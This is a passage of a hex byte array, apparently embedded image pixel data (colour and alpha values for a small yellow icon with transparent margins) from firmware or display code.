0xf7, 0x56, 0xff, 0xf7, 0x56, 0xff, 0xf7, 0x55, 0xff, 0xf7, 0x54, 0xff, 0xf7, 0x54, 0xff, 0xf7, 0x33, 0xff, 0xf7, 0x31, 0xff, 0xf7, 0x0e, 0xff, 0xf7, 0x0e, 0xff, 0xf7, 0x0d, 0xff, 0xf7, 0x0d, 0xff, 0xf7, 0x0b, 0xff, 0xf6, 0xea, 0xff, 0xf6, 0xe8, 0xff, 0xfe, 0xe5, 0xff, 0xfe, 0xe3, 0xff, 0xfe, 0xe2, 0xff, 0xfe, 0xe2, 0xff, 0xfe, 0xc3, 0xf3, 0xfe, 0xc3, 0xa7, 0xfe, 0xc3, 0x83, 0xfe, 0xc5, 0x53, 0xff, 0x80, 0x13, 0xff, 0x60, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe7, 0x1c, 0x00, 0xef, 0x5d, 0x00, 0xd6, 0xba, 0x07, 0xd6, 0x7a, 0x13, 0xde, 0xdb, 0x24, 0xde, 0xdb, 0x2c, 0xde, 0xdb, 0x2c, 0xde, 0xfd, 0x24, 0xd6, 0xde, 0x24, 0xee, 0xee, 0x60, 0xfe, 0xc6, 0xff, 0xf6, 0xc9, 0xff, 0xf6, 0xea, 0xff, 0xf6, 0xee, 0xff, 0xf7, 0x33, 0xff, 0xf7, 0x34, 0xff, 0xf7, 0x35, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x58, 0xff, 0xf7, 0x59, 0xff, 0xf7, 0x79, 0xff, 0xf7, 0x58, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x58, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x56, 0xff, 0xf7, 0x55, 0xff, 0xf7, 0x34, 0xff, 0xf7, 0x33, 0xff, 0xf7, 0x33, 0xff, 0xf7, 0x33, 0xff, 0xf7, 0x31, 0xff, 0xf7, 0x10, 0xff, 0xf7, 0x0f, 0xff, 0xf7, 0x0e, 0xff, 0xf7, 0x0d, 0xff, 0xf6, 0xeb, 0xff, 0xf6, 0xe9, 0xff, 0xfe, 0xe5, 0xff, 0xfe, 0xe3, 0xff, 0xfe, 0xc1, 0xff, 0xfe, 0xc1, 0xff, 0xfe, 0xc1, 0xec, 0xff, 0x2f, 0x1b, 0x8e, 0x7f, 0x04, 0xef, 0xff, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xd6, 0x9a, 0x00, 0xd6, 0x7a, 0x04, 0xd6, 0xba, 0x13, 0xde, 0xbb, 0x1c, 0xde, 0xfb, 0x34, 0xe6, 0xfc, 0x58, 0xde, 0xfb, 0x5f, 0xde, 0xfb, 0x4f, 0xde, 0xfa, 0x4f, 0xf6, 0xec, 0xdf, 0xf6, 0xed, 0xff, 0xf6, 0xf0, 0xff, 0xf7, 0x12, 0xff, 0xf7, 0x35, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x56, 0xff, 0xf7, 0x36, 0xff, 0xf7, 0x58, 0xff, 0xf7, 0x79, 0xff, 0xf7, 0x7a, 0xff, 0xf7, 0x7b, 0xff, 0xf7, 0x7a, 0xff, 0xf7, 0x33, 0xff, 0xf7, 0x33, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x58, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x56, 0xff, 0xf7, 0x34, 0xff, 0xf7, 0x32, 0xff, 0xf7, 0x32, 0xff, 0xf7, 0x32, 0xff, 0xf7, 0x32, 0xff, 0xf7, 0x11, 0xff, 0xf7, 0x32, 0xff, 0xf7, 0x11, 0xff, 0xf7, 0x0f, 0xff, 0xf6, 0xeb, 0xff, 0xfe, 0xe6, 0xff, 0xfe, 0xe3, 0xff, 0xfe, 0xe1, 0xff, 0xfe, 0xc1, 0xff, 0xfe, 0xc0, 0xff, 0xff, 0x20, 0x83, 0xff, 0x80, 0x00, 0xff, 0xff, 0x03, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xde, 0xfb, 0x00, 0xe7, 0x1c, 0x07, 0xd6, 0x7a, 0x18, 0xd6, 0xba, 0x1c, 0xde, 0xdb, 0x28, 0xde, 0xfb, 0x54, 0xe6, 0xfc, 0x67, 0xe6, 0xfc, 0x64, 0xef, 0x16, 0x80, 0xf6, 0xee, 0xf8, 0xf7, 0x12, 0xf8, 0xf7, 0x36, 0xfb, 0xf7, 0x36, 0xfc, 0xf7, 0x58, 0xff, 0xf7, 0x59, 0xff, 0xf7, 0x59, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x58, 0xff, 0xf7, 0x59, 0xff, 0xf7, 0x7a, 0xff, 0xf7, 0x9c, 0xff, 0xf7, 0x34, 0xff, 0xf7, 0x0b, 0xff, 0xf7, 0x32, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x58, 0xff, 0xf7, 0x58, 0xff, 0xf7, 0x58, 0xff, 0xf7, 0x58, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x32, 0xff, 0xf7, 0x31, 0xff, 0xf7, 0x32, 0xff, 0xf7, 0x32, 0xff, 0xf7, 0x32, 0xff, 0xf7, 0x11, 0xff, 0xf7, 0x11, 0xff, 0xf7, 0x11, 0xff, 0xf7, 0x0f, 0xff, 0xf6, 0xea, 0xff, 0xfe, 0xc4, 0xff, 0xfe, 0xc1, 0xf7, 0xfe, 0xc0, 0xec, 0xfe, 0xc0, 0xef, 0xfe, 0xe0, 0xff, 0xff, 0xe0, 0x08, 0xff, 0x6f, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xd6, 0x9a, 0x00, 0xd6, 0x7a, 0x0b, 0xde, 0xbb, 0x20, 0xde, 0xdb, 0x24, 0xd6, 0xba, 0x2f, 0xde, 0xdb, 0x3f, 0xde, 0xfb, 0x43, 0xde, 0xfb, 0x4b, 0xe6, 0xf9, 0x5c, 0xe6, 0xf8, 0x7c, 0xef, 0x1b, 0x9f, 0xef, 0x5d, 0xc7, 0xf7, 0x57, 0xff, 0xf7, 0x58, 0xff, 0xf7, 0x58, 0xff, 0xf7, 0x58, 0xff, 0xf7, 0x58, 0xff, 0xf7, 0x36, 0xff, 0xf7, 0x35, 0xff, 0xf7, 0x36, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x11, 0xff, 0xfe, 0xe6, 0xff, 0xf6, 0xe7, 0xff, 0xf7, 0x10, 0xff, 0xf7, 0x34, 0xff, 0xf7, 0x31, 0xff, 0xf7, 0x33, 0xff, 0xf7, 0x35, 0xff, 0xf7, 0x33, 0xff, 0xf7, 0x0f, 0xff, 0xf7, 0x0d, 0xff, 0xf7, 0x32, 0xff, 0xf7, 0x33, 0xff, 0xf7, 0x11, 0xff, 0xf7, 0x10, 0xff, 0xf7, 0x0f, 0xff, 0xf6, 0xef, 0xff, 0xf6, 0xee, 0xff, 0xf6, 0xeb, 0xff, 0xfe, 0xc4, 0xff, 0xfe, 0xc1, 0xd3, 0xfe, 0xe8, 0x1c, 0xfe, 0xc0, 0x1c, 0xfe, 0xc0, 0x28, 0xff, 0x60, 0x0f, 0xff, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xde, 0xbb, 0x00, 0xde, 0xbb, 0x0c, 0xde, 0xdb, 0x2b, 0xde, 0xbb, 0x33, 0xde, 0xfb, 0x3b, 0xde, 0xdb, 0x40, 0xde, 0xdb, 0x3b, 0xde, 0xdb, 0x34, 0xde, 0xdb, 0x3f, 0xde, 0xdb, 0x54, 0xe7, 0x1c, 0x74, 0xef, 0x3a, 0xbb, 0xf7, 0x34, 0xff, 0xf7, 0x35, 0xff, 0xf7, 0x36, 0xff, 0xf7, 0x36, 0xff, 0xf7, 0x56, 0xff, 0xf7, 0x33, 0xff, 0xf7, 0x11, 0xff, 0xf7, 0x12, 0xff, 0xf7, 0x13, 0xff, 0xf7, 0x12, 0xff, 0xf7, 0x0f, 0xff, 0xf6, 0xe7, 0xff, 0xff, 0x04, 0xff, 0xf6, 0xe7, 0xff, 0xf7, 0x0f, 0xff, 0xf7, 0x0d, 0xff, 0xf6, 0xea, 0xff, 0xf7, 0x0f, 0xff, 0xf7, 0x10, 0xff, 0xf7, 0x0d, 0xff, 0xf6, 0xe8, 0xff, 0xf6, 0xeb, 0xff, 0xf7, 0x33, 0xff, 0xf7, 0x12, 0xff, 0xf6, 0xed, 0xff, 0xf6, 0xec, 0xff, 0xf6, 0xea, 0xff, 0xf6, 0xe9, 0xff, 0xf6, 0xc8, 0xff, 0xfe, 0xc3, 0xff, 0xfe, 0xc1, 0xe7, 0xff, 0x49, 0x18, 0xff, 0xff, 0x03, 0xff, 0xff, 0x00, 0xb5, 0x76, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe7, 0x1c, 0x00, 0xef, 0x5d, 0x07, 0xd6, 0xba, 0x20, 0xd6, 0xba, 0x30, 0xde, 0xdb, 0x3c, 0xde, 0xfb, 0x50, 0xde, 0xfb, 0x50, 0xde, 0xdb, 0x40, 0xde, 0xbb, 0x38, 0xde, 0xdb, 0x4b, 0xe7, 0x1c, 0x63, 0xef, 0x12, 0xc4, 0xf6, 0xf0, 0xff, 0xf7, 0x11, 0xff, 0xf7, 0x14, 0xf3, 0xf7, 0x12, 0xfc, 0xf6, 0xef, 0xff, 0xf6, 0xed, 0xff, 0xf6, 0xed, 0xff, 0xf7, 0x0f, 0xff, 0xf7, 0x11, 0xff, 0xf7, 0x11, 0xff, 0xf6, 0xee, 0xff, 0xf6, 0xe9, 0xff, 0xfe, 0xe4, 0xff, 0xfe, 0xe4, 0xff, 0xfe, 0xe7, 0xff, 0xf6, 0xe7, 0xff, 0xfe, 0xe5, 0xff, 0xf6, 0xe8, 0xff, 0xf7, 0x0d, 0xff, 0xf6, 0xec, 0xff, 0xf6, 0xe8, 0xff, 0xfe, 0xe6, 0xff, 0xf6, 0xea, 0xff, 0xf6, 0xed, 0xff, 0xf6, 0xe7, 0xff, 0xfe, 0xc5, 0xff, 0xfe, 0xc6, 0xff, 0xfe, 0xc5, 0xf7, 0xfe, 0xc5, 0xe3, 0xfe, 0xc2, 0xff, 0xfe, 0xc1, 0xff, 0xff, 0x23, 0x2c, 0xff, 0xdf, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xce, 0x79, 0x00, 0xce, 0x39, 0x03, 0xde, 0xdb, 0x0f, 0xd6, 0x9a, 0x18, 0xde, 0xdb, 0x23, 0xde, 0xdb, 0x43, 0xde, 0xdb, 0x53, 0xde, 0xdb, 0x4b, 0xde, 0xdb, 0x3c, 0xde, 0xdb, 0x37, 0xde, 0xdb, 0x40, 0xf6, 0xee, 0xa8, 0xee, 0xf2, 0x9f, 0xe7, 0x1b, 0x83, 0xe7, 0x1b, 0xa0, 0xf6, 0xee, 0xf8, 0xf6, 0xc8, 0xff, 0xfe, 0xc7, 0xff, 0xf6, 0xe8, 0xff, 0xf6, 0xeb, 0xff, 0xf6, 0xee, 0xff, 0xf7, 0x0f, 0xff, 0xf6, 0xec, 0xff, 0xf6, 0xea, 0xff, 0xf6, 0xe8, 0xff, 0xfe, 0xe5, 0xff, 0xfe, 0xe4, 0xff, 0xfe, 0xe3, 0xff, 0xfe, 0xe2, 0xff, 0xfe, 0xe4, 0xff, 0xf6, 0xe8, 0xff, 0xf6, 0xea, 0xff, 0xfe, 0xe5, 0xff, 0xfe, 0xe4, 0xff, 0xfe, 0xe4, 0xff, 0xfe, 0xe6, 0xff, 0xfe, 0xc3, 0xff, 0xfe, 0xc2, 0xff, 0xfe, 0xc3, 0xff, 0xfe, 0xc3, 0xf3, 0x76, 0xdf, 0x0f, 0xee, 0xb0, 0x37, 0xfe, 0xc5, 0x7f, 0xff, 0x03, 0x48, 0xff, 0x00, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe6, 0xfc, 0x03, 0xde, 0xdb, 0x08, 0xde, 0xfb, 0x0b, 0xde, 0xfb, 0x0f, 0xd6, 0xba, 0x28, 0xde, 0xdb, 0x38, 0xde, 0xdb, 0x3c, 0xde, 0xdb, 0x2c, 0xde, 0xbb, 0x1f, 0xce, 0x7c, 0x13, 0xde, 0xdc, 0x28, 0xde, 0xdb, 0x47, 0xe7, 0x19, 0x88, 0xf6, 0xed, 0xfb, 0xf6, 0xc8, 0xff, 0xfe, 0xc4, 0xff, 0xfe, 0xc5, 0xfb, 0xf6, 0xc7, 0xff, 0xf6, 0xea, 0xff, 0xf6, 0xea, 0xff, 0xf6, 0xe9, 0xff, 0xf6, 0xe9, 0xff, 0xf6, 0xe9, 0xff, 0xf6, 0xe7, 0xff, 0xfe, 0xe4, 0xff, 0xfe, 0xe2, 0xff, 0xfe, 0xe1, 0xff, 0xfe, 0xe2, 0xff, 0xfe, 0xe4, 0xff, 0xfe, 0xc7, 0xff, 0xfe, 0xc5, 0xff, 0xfe, 0xe2, 0xff, 0xfe, 0xc2, 0xff, 0xfe, 0xc1, 0xff, 0xfe, 0xc1, 0xff, 0xfe, 0xc1, 0xff, 0xfe, 0xc2, 0xff, 0xfe, 0xc2, 0xff, 0x05, 0x9f, 0x07, 0xd6, 0x9b, 0x0f, 0xce, 0xde, 0x0c, 0xce, 0xbf, 0x04, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xb5, 0x76, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xc5, 0xf8, 0x03, 0xce, 0x39, 0x03, 0xce, 0x79, 0x04, 0xce, 0x39, 0x0c, 0xd6, 0x9a, 0x17, 0xde, 0xfb, 0x20, 0xd6, 0xba, 0x0c, 0xe6, 0xfc, 0x07, 0xd6, 0x9a, 0x0b, 0xde, 0xfb, 0x1b, 0xee, 0xd4, 0x60, 0xf6, 0xc7, 0xf4, 0xf6, 0xca, 0xc7, 0xe6, 0xb3, 0x2f, 0xfe, 0xc2, 0xc4, 0xfe, 0xc2, 0xff, 0xfe, 0xc1, 0xff, 0xfe, 0xc4, 0xff, 0xfe, 0xc5, 0xff, 0xfe, 0xe6, 0xff, 0xf6, 0xe8, 0xff, 0xf6, 0xc9, 0xff, 0xfe, 0xe7, 0xff, 0xfe, 0xc3, 0xff, 0xfe, 0xe1, 0xff, 0xfe, 0xc1, 0xff, 0xfe, 0xc2, 0xff, 0xfe, 0xe2, 0xff, 0xfe, 0xc2, 0xff, 0xfe, 0xc1, 0xff, 0xfe, 0xc1, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0xa4, 0xfe, 0xe2, 0x3b, 0xfe, 0xc0, 0xcc, 0xfe, 0xc1, 0xff, 0x9f, 0xfc, 0x04, 0xff, 0xff, 0x00, 0xc6, 0x38, 0x03, 0xde, 0xdb, 0x07, 0xce, 0x59, 0x03, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x03, 0xf7, 0x9e, 0x03, 0xff, 0xff, 0x03, 0xce, 0x59, 0x04, 0xde, 0xbb, 0x07, 0xd6, 0x9a, 0x04, 0xbd, 0xd7, 0x04, 0xef, 0x5d, 0x03, 0xde, 0xdb, 0x08, 0xee, 0xd4, 0x1f, 0xee, 0xae, 0x38, 0xd6, 0xbb, 0x24, 0xd6, 0xdf, 0x1f, 0xfe, 0xe2, 0xa3, 0xfe, 0xc1, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xc1, 0x8b, 0xfe, 0xc1, 0xff, 0xfe, 0xc2, 0xff, 0xfe, 0xc3, 0xff, 0xfe, 0xc4, 0xff, 0xfe, 0xc5, 0xff, 0xfe, 0xc4, 0xff, 0xfe, 0xc1, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xc1, 0xff, 0xfe, 0xc1, 0xec, 0xfe, 0xc1, 0xac, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xe1, 0x7b, 0xfe, 0xa0, 0x00, 0xfe, 0xab, 0x00, 0xfe, 0xc3, 0x37, 0xff, 0x49, 0x08, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xe7, 0x1c, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb5, 0x76, 0x00, 0xb5, 0x96, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x03, 0xff, 0xff, 0x00, 0xff, 0xff, 0x03, 0xff, 0xff, 0x03, 0xd6, 0x7a, 0x03, 0xce, 0x59, 0x04, 0xe7, 0x3c, 0x03, 0xf7, 0x9e, 0x03, 0xd6, 0x7a, 0x04, 0xd6, 0xbb, 0x04, 0xe7, 0x1d, 0x07, 0xd6, 0xba, 0x0c, 0xd6, 0xbd, 0x1c, 0xf6, 0xe8, 0x83, 0xfe, 0xc1, 0xf0, 0xfe, 0xc4, 0x43, 0xfe, 0x80, 0x00, 0xfe, 0xc0, 0xef, 0xfe, 0xc1, 0xff, 0xfe, 0xc1, 0xeb, 0xfe, 0xc3, 0x73, 0xfe, 0xc1, 0xff, 0xfe, 0xc1, 0xff, 0xfe, 0xc2, 0xec, 0xfe, 0xc1, 0x78, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0xc8, 0xfe, 0xe0, 0x00, 0xfe, 0xc1, 0x5f, 0xfe, 0xc0, 0xff, 0xff, 0x01, 0x50, 0xfe, 0xe0, 0x00, 0xfd, 0x80, 0x00, 0xfe, 0xeb, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xb5, 0x76, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x03, 0xff, 0xff, 0x03, 0xf7, 0x7e, 0x03, 0xc6, 0x18, 0x04, 0xff, 0xff, 0x03, 0xff, 0xbf, 0x03, 0xce, 0x39, 0x04, 0xe6, 0xfc, 0x03, 0xef, 0x3d, 0x03, 0xc6, 0x5c, 0x04, 0xf6, 0xcc, 0x2b, 0xf6, 0xcf, 0x28, 0x05, 0x5f, 0x00, 0xfe, 0xc0, 0x00, 0xfe, 0xe0, 0x7b, 0xfe, 0xc0, 0xff, 0xfe, 0xc3, 0x33, 0xfe, 0xc0, 0x00, 0xfe, 0xc0, 0xa7, 0xfe, 0xc0, 0xff, 0xfe, 0xc2, 0x8c, 0xfe, 0x80, 0x00, 0xfe, 0xc0, 0x5b, 0xfe, 0xc0, 0xff, 0xfe, 0xe0, 0x60, 0xfe, 0x20, 0x00, 0xfd, 0xa0, 0x00, 0xfe, 0xc0, 0x2c, 0xff, 0x40, 0x1b, 0xff, 0x22, 0x00, 0x00, 0x00, 0x00, 0xb5, 0x76, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xb5, 0x76, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x03, 0xff, 0xff, 0x03, 0xff, 0xff, 0x03, 0xff, 0xff, 0x03, 0xff, 0xff, 0x00, 0xe7, 0x3c, 0x03, 0xff, 0xdf, 0x03, 0xbe, 0x1c, 0x04, 0xe7, 0x3d, 0x08, 0xc6, 0x18, 0x03, 0xff, 0xff, 0x00, 0xfe, 0xe3, 0x27, 0xfe, 0xc1, 0x44, 0xfe, 0x60, 0x00, 0xff, 0x9b, 0x00, 0xfe, 0xe0, 0x1f, 0xfe, 0xc0, 0xdf, 0xfe, 0x20, 0x00, 0xff, 0xff, 0x00, 0xfe, 0x60, 0x00, 0xfe, 0xc0, 0x9f, 0xff, 0xe1, 0x00, 0xff, 0x4d, 0x00, 0xff, 0xff, 0x00, 0xfe, 0x80, 0x00, 0xff, 0x40, 0x00, 0xff, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb5, 0x76, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xef, 0x5d, 0x03, 0xef, 0x7d, 0x03, 0xf7, 0x7e, 0x03, 0xff, 0xff, 0x00, 0xff, 0xf9, 0x00, 0xfe, 0x40, 0x00, 0xff, 0xfe, 0x00, 0xff, 0xff, 0x00, 0xff, 0x00, 0x00, 0xfe, 0xc0, 0x13, 0xfe, 0xe1, 0x00, 0xff, 0xff, 0x00, 0xff, 0x2c, 0x00, 0xff, 0xe4, 0x00, 0xff, 0x40, 0x00, 0xff, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 